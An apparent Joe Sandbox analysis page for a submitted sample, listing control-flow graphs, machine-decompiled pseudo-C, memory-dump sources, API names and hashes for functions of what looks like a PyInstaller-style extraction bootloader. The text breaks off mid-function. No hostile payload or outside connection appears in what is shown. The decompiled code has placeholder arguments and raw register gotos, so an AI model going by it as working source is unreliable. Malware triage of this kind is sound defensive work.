                                                                                                                                                                                                                              control_flow_graph 77 7ff735c41440-7ff735c41457 call 7ff735c461d0 80 7ff735c41459-7ff735c41461 77->80 81 7ff735c41462-7ff735c41485 call 7ff735c464f0 77->81 84 7ff735c414a7-7ff735c414ad 81->84 85 7ff735c41487-7ff735c414a2 call 7ff735c42580 81->85 87 7ff735c414e0-7ff735c414f4 call 7ff735c4ebd0 84->87 88 7ff735c414af-7ff735c414ba call 7ff735c43b00 84->88 93 7ff735c41635-7ff735c41647 85->93 96 7ff735c41516-7ff735c4151a 87->96 97 7ff735c414f6-7ff735c41511 call 7ff735c42580 87->97 94 7ff735c414bf-7ff735c414c5 88->94 94->87 95 7ff735c414c7-7ff735c414db call 7ff735c42820 94->95 106 7ff735c41617-7ff735c4161d 95->106 100 7ff735c4151c-7ff735c41528 call 7ff735c41050 96->100 101 7ff735c41534-7ff735c41554 call 7ff735c53790 96->101 97->106 107 7ff735c4152d-7ff735c4152f 100->107 109 7ff735c41556-7ff735c41570 call 7ff735c42580 101->109 110 7ff735c41575-7ff735c4157b 101->110 111 7ff735c4162b-7ff735c4162e call 7ff735c4e568 106->111 112 7ff735c4161f call 7ff735c4e568 106->112 107->106 123 7ff735c4160d-7ff735c41612 109->123 114 7ff735c41581-7ff735c41586 110->114 115 7ff735c41605-7ff735c41608 call 7ff735c5377c 110->115 122 7ff735c41633 111->122 121 7ff735c41624 112->121 120 7ff735c41590-7ff735c415b2 call 7ff735c4e8b8 114->120 115->123 126 7ff735c415e5-7ff735c415ec 120->126 127 7ff735c415b4-7ff735c415cc call 7ff735c4f554 120->127 121->111 122->93 123->106 129 7ff735c415f3-7ff735c415fb call 7ff735c42580 126->129 133 7ff735c415ce-7ff735c415d1 127->133 134 7ff735c415d5-7ff735c415e3 127->134 135 7ff735c41600 129->135 133->120 136 7ff735c415d3 133->136 134->129 135->115 136->135
                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                              			E00007FF77FF735C41440(void* __rcx, void* __rdx) {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t5;
				void* _t9;
				void* _t10;

				_t1 = E00007FF77FF735C461D0(_t2, _t3, _t5, __rcx, _t9, _t10); // executed
				if (_t1 != 0xffffffff) goto 0x35c41462;
				return _t1;
			}









                                                                                                                                                                                                                              0x7ff735c4144f
                                                                                                                                                                                                                              0x7ff735c41457
                                                                                                                                                                                                                              0x7ff735c41461

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                              • API String ID: 0-666925554
                                                                                                                                                                                                                              • Opcode ID: 01fe3afd9cd47186ee6bf98b467956efed351efb121243c63caeb0c541630d4a
                                                                                                                                                                                                                              • Instruction ID: a23c9bad3716fc7df23f1ba223e96d8263e6eb4a2a22a2a541fb505d791a2f49
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01fe3afd9cd47186ee6bf98b467956efed351efb121243c63caeb0c541630d4a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B65180A3B0869361EA12FB12E450AB9E362AF45FDCFC44531DD5D07695EE3CE544E320
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C470C0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                                                                              • API String ID: 4998090-2855260032
                                                                                                                                                                                                                              • Opcode ID: 9b33e1f2be917ee71f989bae7cbc11116d454c2ca5482119fd4466b07436f7cc
                                                                                                                                                                                                                              • Instruction ID: b54a3dc4a44faf4f23d669da10b28f02fb5be72234f298528ce74099c5bc6715
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b33e1f2be917ee71f989bae7cbc11116d454c2ca5482119fd4466b07436f7cc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E41C57360C64392E710AF51E8446AAE3A2FF84F98F841231EA5E43AD4DF3CD545D710
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C64F24 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 315 7ff735c64f24-7ff735c64f97 call 7ff735c64c54 318 7ff735c64f99-7ff735c64fa2 call 7ff735c53af8 315->318 319 7ff735c64fb1-7ff735c64fbb call 7ff735c56338 315->319 324 7ff735c64fa5-7ff735c64fac call 7ff735c53b18 318->324 325 7ff735c64fbd-7ff735c64fd4 call 7ff735c53af8 call 7ff735c53b18 319->325 326 7ff735c64fd6-7ff735c6503f CreateFileW 319->326 339 7ff735c652f3-7ff735c65313 324->339 325->324 327 7ff735c650bc-7ff735c650c7 GetFileType 326->327 328 7ff735c65041-7ff735c65047 326->328 334 7ff735c6511a-7ff735c65121 327->334 335 7ff735c650c9-7ff735c65104 GetLastError call 7ff735c53a8c CloseHandle 327->335 331 7ff735c65089-7ff735c650b7 GetLastError call 7ff735c53a8c 328->331 332 7ff735c65049-7ff735c6504d 328->332 331->324 332->331 337 7ff735c6504f-7ff735c65087 CreateFileW 332->337 342 7ff735c65129-7ff735c6512c 334->342 343 7ff735c65123-7ff735c65127 334->343 335->324 350 7ff735c6510a-7ff735c65115 call 7ff735c53b18 335->350 337->327 337->331 344 7ff735c65132-7ff735c65187 call 7ff735c56250 342->344 345 7ff735c6512e 342->345 343->344 353 7ff735c65189-7ff735c65195 call 7ff735c64e60 344->353 354 7ff735c651a6-7ff735c651d7 call 7ff735c649dc 344->354 345->344 350->324 353->354 360 7ff735c65197 353->360 361 7ff735c651dd-7ff735c65220 354->361 362 7ff735c651d9-7ff735c651db 354->362 363 7ff735c65199-7ff735c651a1 call 7ff735c595e0 360->363 364 7ff735c65242-7ff735c6524d 361->364 365 7ff735c65222-7ff735c65226 361->365 362->363 363->339 367 7ff735c65253-7ff735c65257 364->367 368 7ff735c652f1 364->368 365->364 366 7ff735c65228-7ff735c6523d 365->366 366->364 367->368 370 7ff735c6525d-7ff735c652a2 CloseHandle CreateFileW 367->370 368->339 372 7ff735c652d7-7ff735c652ec 370->372 373 7ff735c652a4-7ff735c652d2 GetLastError call 7ff735c53a8c call 7ff735c56478 370->373 372->368 373->372
                                                                                                                                                                                                                              C-Code - Quality: 40%
                                                                                                                                                                                                                              			E00007FF77FF735C64F24(void* __ecx, void* __ebp, void* __eflags, long long __rbx, long long __rcx, signed int* __rdx, long long __rdi, long long __rsi, long long __r8) {
				void* __rbp;
				signed int _t151;
				long _t164;
				void* _t168;
				signed int _t170;
				void* _t184;
				signed int _t187;
				signed int _t188;
				void* _t216;
				intOrPtr* _t237;
				intOrPtr* _t240;
				long long _t252;
				long long _t260;
				signed long long _t266;
				signed long long _t280;
				intOrPtr _t281;
				signed long long _t282;
				signed long long _t301;
				signed int* _t306;
				long long _t309;
				void* _t311;
				void* _t312;
				intOrPtr* _t314;
				void* _t315;
				void* _t323;
				void* _t325;
				void* _t329;
				void* _t333;

				_t317 = __r8;
				_t216 = __ebp;
				_t237 = _t314;
				 *((long long*)(_t237 + 8)) = __rbx;
				 *((long long*)(_t237 + 0x10)) = __rsi;
				 *((long long*)(_t237 + 0x20)) = __rdi;
				 *((long long*)(_t237 + 0x18)) = __r8;
				_t312 = _t237 - 0x47;
				_t315 = _t314 - 0xc0;
				r12d = r9d;
				_t260 = __r8;
				r9d =  *(_t312 + 0x77);
				_t306 = __rdx;
				r8d =  *(_t312 + 0x6f);
				_t309 = __rcx;
				E00007FF77FF735C64C54(r12d, __eflags, _t237, __r8, _t312 - 1, _t312);
				asm("movups xmm0, [eax]");
				asm("movsd xmm1, [eax+0x10]");
				asm("movups [ebp-0x59], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("dec cx");
				asm("movsd [ebp-0x39], xmm1");
				asm("movsd [ebp-0x49], xmm1");
				 *(_t312 - 0x29) = _t333 >> 0x20;
				if (r15d != 0xffffffff) goto 0x35c64fb1;
				E00007FF77FF735C53AF8(_t237);
				 *_t237 = 0;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FF77FF735C53B18(_t237);
				goto 0x35c652f3;
				_t151 = E00007FF77FF735C56338(r12d, _t237, __r8, __rdx, __rdx, _t309);
				 *__rdx = _t151;
				if (_t151 != 0xffffffff) goto 0x35c64fd6;
				E00007FF77FF735C53AF8(_t237);
				 *_t237 = 0;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FF77FF735C53B18(_t237);
				 *_t237 = 0x18;
				goto 0x35c64fa5;
				r8d = r15d;
				r14d = r14d |  *(_t312 - 0x49);
				 *_t309 = 1;
				 *((long long*)(_t315 + 0x30)) = _t309;
				 *(_t315 + 0x28) = r14d;
				 *((intOrPtr*)(_t315 + 0x20)) =  *((intOrPtr*)(_t312 - 0x51));
				 *((intOrPtr*)(_t312 - 0x21)) = 0x18;
				 *((long long*)(_t312 - 0x19)) = _t309;
				 *(_t312 - 0x11) =  !(r12d >> 7) & 0x00000001;
				 *(_t312 - 0x31) =  *(_t312 - 0x49) >> 0x20;
				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
				_t187 =  *(_t312 - 0x55);
				if (_t237 != 0xffffffff) goto 0x35c650bc;
				if ((_t187 & 0xc0000000) != 0xc0000000) goto 0x35c65089;
				if ((r12b & 0x00000001) == 0) goto 0x35c65089;
				 *((long long*)(_t315 + 0x30)) = _t309;
				asm("btr ebx, 0x1f");
				 *(_t312 - 0x55) = _t187;
				r8d = r15d;
				 *(_t315 + 0x28) = r14d;
				 *((intOrPtr*)(_t315 + 0x20)) =  *((intOrPtr*)(_t312 - 0x51));
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				if (_t237 != 0xffffffff) goto 0x35c650bc;
				_t266 =  *__rdx;
				_t240 =  *((intOrPtr*)(0x35c8aa40 + (_t266 >> 6) * 8));
				 *(_t240 + 0x38 + (_t266 + _t266 * 8) * 8) =  *(_t240 + 0x38 + (_t266 + _t266 * 8) * 8) & 0x000000fe;
				E00007FF77FF735C53A8C(GetLastError(), _t240, _t266 + _t266 * 8);
				goto 0x35c64fa5;
				_t164 = GetFileType(_t333); // executed
				if (_t164 != 0) goto 0x35c6511a;
				_t188 = GetLastError();
				E00007FF77FF735C53A8C(_t165, _t240, _t237);
				 *( *((intOrPtr*)(0x35c8aa40 + ( *__rdx >> 6) * 8)) + 0x38 + ( *__rdx +  *__rdx * 8) * 8) =  *( *((intOrPtr*)(0x35c8aa40 + ( *__rdx >> 6) * 8)) + 0x38 + ( *__rdx +  *__rdx * 8) * 8) & 0x000000fe;
				CloseHandle(_t329);
				if (_t188 != 0) goto 0x35c64fa5;
				_t168 = E00007FF77FF735C53B18(_t240);
				 *_t240 = 0xd;
				goto 0x35c64fa5;
				r14b =  *(_t312 - 0x59);
				if (_t168 != 2) goto 0x35c65129;
				r14b = r14b | 0x00000040;
				goto 0x35c65132;
				if (_t168 != 3) goto 0x35c65132;
				r14b = r14b | 0x00000008;
				E00007FF77FF735C56250(_t168, _t188,  *__rdx, _t260, _t237, __rdx, _t309, _t312, _t325, _t323);
				r14b = r14b | 0x00000001;
				 *(_t312 - 0x41) = r14b;
				 *(_t312 - 0x59) = r14b;
				 *( *((intOrPtr*)(0x35c8aa40 + ( *__rdx >> 6) * 8)) + 0x38 + ( *__rdx +  *__rdx * 8) * 8) = r14b;
				 *((intOrPtr*)( *((intOrPtr*)(0x35c8aa40 + ( *__rdx >> 6) * 8)) + 0x39 + ( *__rdx +  *__rdx * 8) * 8)) = sil;
				if ((r12b & 0x00000002) == 0) goto 0x35c651a6;
				_t170 = E00007FF77FF735C64E60(_t188,  *__rdx, r12d & 0x0000003f, 0, _t260, _t317, _t312 - 0x21);
				r14d = _t170;
				if (_t170 == 0) goto 0x35c651a6;
				E00007FF77FF735C595E0( *((intOrPtr*)(0x35c8aa40 + ( *__rdx >> 6) * 8)), _t260, _t306);
				goto 0x35c652f3;
				asm("movups xmm0, [ebp-0x59]");
				asm("movsd xmm1, [ebp-0x39]");
				r8d = r12d;
				asm("movaps [ebp-0x1], xmm0");
				 *((intOrPtr*)(_t312 - 0x61)) = sil;
				asm("movsd [ebp+0xf], xmm1");
				r14d = E00007FF77FF735C649DC( *_t306, _t216, _t260, _t312 - 1, _t309, _t312, _t317, _t312 - 0x61);
				if (r14d == 0) goto 0x35c651dd;
				goto 0x35c65199;
				 *((char*)( *((intOrPtr*)(0x35c8aa40 + ( *_t306 >> 6) * 8)) + 0x39 + ( *_t306 +  *_t306 * 8) * 8)) =  *((intOrPtr*)(_t312 - 0x61));
				_t280 =  *_t306;
				_t301 = _t280 + _t280 * 8;
				_t281 =  *((intOrPtr*)(0x35c8aa40 + (_t280 >> 6) * 8));
				 *(_t281 + 0x3d + _t301 * 8) =  *(_t281 + 0x3d + _t301 * 8) & 0x000000fe;
				 *(_t281 + 0x3d + _t301 * 8) =  *(_t281 + 0x3d + _t301 * 8) | r12d >> 0x00000010 & 0x00000001;
				if (( *(_t312 - 0x41) & 0x00000048) != 0) goto 0x35c65242;
				if ((r12b & 0x00000008) == 0) goto 0x35c65242;
				_t282 =  *_t306;
				_t252 =  *((intOrPtr*)(0x35c8aa40 + (_t282 >> 6) * 8));
				 *(_t252 + 0x38 + (_t282 + _t282 * 8) * 8) =  *(_t252 + 0x38 + (_t282 + _t282 * 8) * 8) | 0x00000020;
				if ((_t188 & 0xc0000000) != 0xc0000000) goto 0x35c652f1;
				if ((r12b & 0x00000001) == 0) goto 0x35c652f1;
				CloseHandle(_t311);
				r8d =  *(_t312 - 0x29);
				asm("btr ebx, 0x1f");
				 *((long long*)(_t315 + 0x30)) = _t309;
				 *(_t315 + 0x28) = 0xc0000000;
				 *((intOrPtr*)(_t315 + 0x20)) =  *((intOrPtr*)(_t312 - 0x51));
				 *(_t312 - 0x55) = _t188;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				if (_t252 != 0xffffffff) goto 0x35c652d7;
				_t184 = E00007FF77FF735C53A8C(GetLastError(), _t252,  *((intOrPtr*)(_t312 + 0x5f)));
				 *( *((intOrPtr*)(0x35c8aa40 + ( *_t306 >> 6) * 8)) + 0x38 + ( *_t306 +  *_t306 * 8) * 8) =  *( *((intOrPtr*)(0x35c8aa40 + ( *_t306 >> 6) * 8)) + 0x38 + ( *_t306 +  *_t306 * 8) * 8) & 0x000000fe;
				E00007FF77FF735C56478(_t184, _t188,  *_t306, _t260, _t306, _t309);
				goto 0x35c64fa5;
				 *((long long*)( *((intOrPtr*)(0x35c8aa40 + ( *_t306 >> 6) * 8)) + 0x28 + ( *_t306 +  *_t306 * 8) * 8)) = _t252;
				return 0;
			}































                                                                                                                                                                                                                              0x7ff735c64f24
                                                                                                                                                                                                                              0x7ff735c64f24
                                                                                                                                                                                                                              0x7ff735c64f24
                                                                                                                                                                                                                              0x7ff735c64f27
                                                                                                                                                                                                                              0x7ff735c64f2b
                                                                                                                                                                                                                              0x7ff735c64f2f
                                                                                                                                                                                                                              0x7ff735c64f33
                                                                                                                                                                                                                              0x7ff735c64f40
                                                                                                                                                                                                                              0x7ff735c64f44
                                                                                                                                                                                                                              0x7ff735c64f4b
                                                                                                                                                                                                                              0x7ff735c64f4e
                                                                                                                                                                                                                              0x7ff735c64f51
                                                                                                                                                                                                                              0x7ff735c64f55
                                                                                                                                                                                                                              0x7ff735c64f58
                                                                                                                                                                                                                              0x7ff735c64f5c
                                                                                                                                                                                                                              0x7ff735c64f66
                                                                                                                                                                                                                              0x7ff735c64f6b
                                                                                                                                                                                                                              0x7ff735c64f6e
                                                                                                                                                                                                                              0x7ff735c64f73
                                                                                                                                                                                                                              0x7ff735c64f77
                                                                                                                                                                                                                              0x7ff735c64f7c
                                                                                                                                                                                                                              0x7ff735c64f81
                                                                                                                                                                                                                              0x7ff735c64f8a
                                                                                                                                                                                                                              0x7ff735c64f8f
                                                                                                                                                                                                                              0x7ff735c64f97
                                                                                                                                                                                                                              0x7ff735c64f99
                                                                                                                                                                                                                              0x7ff735c64fa0
                                                                                                                                                                                                                              0x7ff735c64fa2
                                                                                                                                                                                                                              0x7ff735c64fa5
                                                                                                                                                                                                                              0x7ff735c64fac
                                                                                                                                                                                                                              0x7ff735c64fb1
                                                                                                                                                                                                                              0x7ff735c64fb6
                                                                                                                                                                                                                              0x7ff735c64fbb
                                                                                                                                                                                                                              0x7ff735c64fbd
                                                                                                                                                                                                                              0x7ff735c64fc4
                                                                                                                                                                                                                              0x7ff735c64fc6
                                                                                                                                                                                                                              0x7ff735c64fc9
                                                                                                                                                                                                                              0x7ff735c64fce
                                                                                                                                                                                                                              0x7ff735c64fd4
                                                                                                                                                                                                                              0x7ff735c64fe8
                                                                                                                                                                                                                              0x7ff735c64ff4
                                                                                                                                                                                                                              0x7ff735c64ffb
                                                                                                                                                                                                                              0x7ff735c65003
                                                                                                                                                                                                                              0x7ff735c65008
                                                                                                                                                                                                                              0x7ff735c6500d
                                                                                                                                                                                                                              0x7ff735c65018
                                                                                                                                                                                                                              0x7ff735c6501f
                                                                                                                                                                                                                              0x7ff735c65023
                                                                                                                                                                                                                              0x7ff735c65026
                                                                                                                                                                                                                              0x7ff735c6502a
                                                                                                                                                                                                                              0x7ff735c65030
                                                                                                                                                                                                                              0x7ff735c6503f
                                                                                                                                                                                                                              0x7ff735c65047
                                                                                                                                                                                                                              0x7ff735c6504d
                                                                                                                                                                                                                              0x7ff735c65056
                                                                                                                                                                                                                              0x7ff735c6505b
                                                                                                                                                                                                                              0x7ff735c6505f
                                                                                                                                                                                                                              0x7ff735c65062
                                                                                                                                                                                                                              0x7ff735c65069
                                                                                                                                                                                                                              0x7ff735c6506e
                                                                                                                                                                                                                              0x7ff735c6507a
                                                                                                                                                                                                                              0x7ff735c65087
                                                                                                                                                                                                                              0x7ff735c65089
                                                                                                                                                                                                                              0x7ff735c650a1
                                                                                                                                                                                                                              0x7ff735c650a5
                                                                                                                                                                                                                              0x7ff735c650b2
                                                                                                                                                                                                                              0x7ff735c650b7
                                                                                                                                                                                                                              0x7ff735c650bf
                                                                                                                                                                                                                              0x7ff735c650c7
                                                                                                                                                                                                                              0x7ff735c650d1
                                                                                                                                                                                                                              0x7ff735c650d3
                                                                                                                                                                                                                              0x7ff735c650f4
                                                                                                                                                                                                                              0x7ff735c650fc
                                                                                                                                                                                                                              0x7ff735c65104
                                                                                                                                                                                                                              0x7ff735c6510a
                                                                                                                                                                                                                              0x7ff735c6510f
                                                                                                                                                                                                                              0x7ff735c65115
                                                                                                                                                                                                                              0x7ff735c6511a
                                                                                                                                                                                                                              0x7ff735c65121
                                                                                                                                                                                                                              0x7ff735c65123
                                                                                                                                                                                                                              0x7ff735c65127
                                                                                                                                                                                                                              0x7ff735c6512c
                                                                                                                                                                                                                              0x7ff735c6512e
                                                                                                                                                                                                                              0x7ff735c65137
                                                                                                                                                                                                                              0x7ff735c65149
                                                                                                                                                                                                                              0x7ff735c65154
                                                                                                                                                                                                                              0x7ff735c65158
                                                                                                                                                                                                                              0x7ff735c65164
                                                                                                                                                                                                                              0x7ff735c6517e
                                                                                                                                                                                                                              0x7ff735c65187
                                                                                                                                                                                                                              0x7ff735c6518b
                                                                                                                                                                                                                              0x7ff735c65190
                                                                                                                                                                                                                              0x7ff735c65195
                                                                                                                                                                                                                              0x7ff735c65199
                                                                                                                                                                                                                              0x7ff735c651a1
                                                                                                                                                                                                                              0x7ff735c651a6
                                                                                                                                                                                                                              0x7ff735c651b0
                                                                                                                                                                                                                              0x7ff735c651b9
                                                                                                                                                                                                                              0x7ff735c651bc
                                                                                                                                                                                                                              0x7ff735c651c0
                                                                                                                                                                                                                              0x7ff735c651c4
                                                                                                                                                                                                                              0x7ff735c651ce
                                                                                                                                                                                                                              0x7ff735c651d7
                                                                                                                                                                                                                              0x7ff735c651db
                                                                                                                                                                                                                              0x7ff735c651f2
                                                                                                                                                                                                                              0x7ff735c651f6
                                                                                                                                                                                                                              0x7ff735c65203
                                                                                                                                                                                                                              0x7ff735c65207
                                                                                                                                                                                                                              0x7ff735c65213
                                                                                                                                                                                                                              0x7ff735c65218
                                                                                                                                                                                                                              0x7ff735c65220
                                                                                                                                                                                                                              0x7ff735c65226
                                                                                                                                                                                                                              0x7ff735c65228
                                                                                                                                                                                                                              0x7ff735c65239
                                                                                                                                                                                                                              0x7ff735c6523d
                                                                                                                                                                                                                              0x7ff735c6524d
                                                                                                                                                                                                                              0x7ff735c65257
                                                                                                                                                                                                                              0x7ff735c65260
                                                                                                                                                                                                                              0x7ff735c6526e
                                                                                                                                                                                                                              0x7ff735c65272
                                                                                                                                                                                                                              0x7ff735c65276
                                                                                                                                                                                                                              0x7ff735c6527b
                                                                                                                                                                                                                              0x7ff735c65282
                                                                                                                                                                                                                              0x7ff735c6528a
                                                                                                                                                                                                                              0x7ff735c65295
                                                                                                                                                                                                                              0x7ff735c652a2
                                                                                                                                                                                                                              0x7ff735c652ac
                                                                                                                                                                                                                              0x7ff735c652c6
                                                                                                                                                                                                                              0x7ff735c652cd
                                                                                                                                                                                                                              0x7ff735c652d2
                                                                                                                                                                                                                              0x7ff735c652ec
                                                                                                                                                                                                                              0x7ff735c65313

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1330151763-0
                                                                                                                                                                                                                              • Opcode ID: 4ea84e223beb46d4f92a12436d652681fbbcee94256310a0222ad473b4496ac5
                                                                                                                                                                                                                              • Instruction ID: 40bfac36518a1c5e67df53faf5bf823839170f66768e35a20e923c5aed312a94
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ea84e223beb46d4f92a12436d652681fbbcee94256310a0222ad473b4496ac5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31C1DF37B28A4395EB10EFA9C4906ACB761FB48FA8B940325DE2E97395CF38D151D350
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C41050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 378 7ff735c41050-7ff735c410ab call 7ff735c49110 381 7ff735c410ad-7ff735c410d2 call 7ff735c42820 378->381 382 7ff735c410d3-7ff735c410eb call 7ff735c53790 378->382 387 7ff735c41109-7ff735c41119 call 7ff735c53790 382->387 388 7ff735c410ed-7ff735c41104 call 7ff735c42580 382->388 394 7ff735c41137-7ff735c41147 387->394 395 7ff735c4111b-7ff735c41132 call 7ff735c42580 387->395 393 7ff735c4126c-7ff735c41281 call 7ff735c48e00 call 7ff735c5377c * 2 388->393 411 7ff735c41286-7ff735c412a0 393->411 398 7ff735c41150-7ff735c41175 call 7ff735c4e8b8 394->398 395->393 404 7ff735c4125e 398->404 405 7ff735c4117b-7ff735c41185 call 7ff735c4e62c 398->405 407 7ff735c41264 404->407 405->404 412 7ff735c4118b-7ff735c41197 405->412 407->393 413 7ff735c411a0-7ff735c411c8 call 7ff735c475d0 412->413 416 7ff735c411ca-7ff735c411cd 413->416 417 7ff735c41241-7ff735c4125c call 7ff735c42820 413->417 418 7ff735c4123c 416->418 419 7ff735c411cf-7ff735c411d9 416->419 417->407 418->417 421 7ff735c411db-7ff735c411e8 call 7ff735c4f554 419->421 422 7ff735c41203-7ff735c41206 419->422 429 7ff735c411ed-7ff735c411f0 421->429 424 7ff735c41219-7ff735c4121e 422->424 425 7ff735c41208-7ff735c41216 call 7ff735c4b150 422->425 424->413 428 7ff735c41220-7ff735c41223 424->428 425->424 431 7ff735c41237-7ff735c4123a 428->431 432 7ff735c41225-7ff735c41228 428->432 433 7ff735c411fe-7ff735c41201 429->433 434 7ff735c411f2-7ff735c411fc call 7ff735c4e62c 429->434 431->407 432->417 435 7ff735c4122a-7ff735c41232 432->435 433->417 434->424 434->433 435->398
                                                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                                                              			E00007FF77FF735C41050(long long __rax, long long __rcx, long long __rdx, void* __r8, void* __r9) {
				void* __rbx;
				void* __rbp;
				void* _t13;
				void* _t28;
				void* _t31;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t41;
				void* _t44;

				_t40 = __r9;
				_t39 = __r8;
				_t18 = __rax;
				 *((long long*)(_t36 + 0x10)) = __rdx;
				 *((long long*)(_t36 + 8)) = __rcx;
				_t37 = _t36 - 0x88;
				 *((long long*)(_t37 + 0x50)) = __rax;
				 *((long long*)(_t37 + 0x58)) = __rax;
				 *((long long*)(_t37 + 0x60)) = __rax;
				_t6 = _t18 + 0x58; // 0x58
				r8d = _t6;
				 *((intOrPtr*)(_t37 + 0x28)) = 0;
				 *((long long*)(_t37 + 0x20)) = __rax;
				_t13 = E00007FF77FF735C49110(__rax, __rdx, _t37 + 0x20, "1.2.11", _t34, _t44); // executed
				r15d = _t13;
				if (_t13 == 0) goto 0x35c410d3;
				r8d = _t13;
